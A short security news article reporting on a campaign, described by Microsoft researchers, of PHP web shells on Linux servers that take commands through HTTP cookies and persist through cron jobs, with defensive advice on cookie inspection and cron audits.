A sophisticated and stealthy attack campaign targeting Linux servers has been uncovered by Microsoft's security researchers. Threat actors are deploying PHP-based web shells that uniquely leverage HTTP cookies as their primary command-and-control (C2) channel, a technique designed to evade traditional detection mechanisms. Unlike conventional web shells that expose malicious commands through easily monitored URL parameters or POST request bodies, these shells remain dormant until activated by specific, attacker-supplied values embedded directly within incoming HTTP cookies. This method allows the malicious code to blend seamlessly with normal web traffic, making it significantly harder for security tools and analysts to identify anomalous behavior indicative of remote code execution.
The persistence mechanism employed by these threats is equally concerning. Microsoft's Defender Security Research Team detailed that upon successful compromise, the attackers establish a foothold by creating cron jobs—scheduled tasks on Linux systems. These cron jobs are configured to periodically fetch and execute secondary payloads or scripts from attacker-controlled servers. This dual-layer approach ensures that even if the initial web shell is discovered and removed, the cron job will persistently attempt to re-establish the connection and download new malicious components, granting the threat actors a resilient and long-term presence on the infected host. The use of cron for persistence is a classic yet effective technique, capitalizing on a legitimate system feature to maintain access.
This campaign highlights a significant evolution in the tactics of cybercriminals targeting web infrastructure. By moving the control channel from the request body to the cookie header, attackers are exploiting a potential blind spot in many web application firewall (WAF) rules and logging configurations, which may not scrutinize cookie contents with the same rigor as other parts of an HTTP request. Security teams are advised to enhance their monitoring strategies to include deep inspection of cookie values for suspicious patterns or encoded commands. Furthermore, robust server hardening, including regular audits of cron jobs and file integrity monitoring for web directories, is critical to detect and mitigate such advanced, fileless persistence techniques.
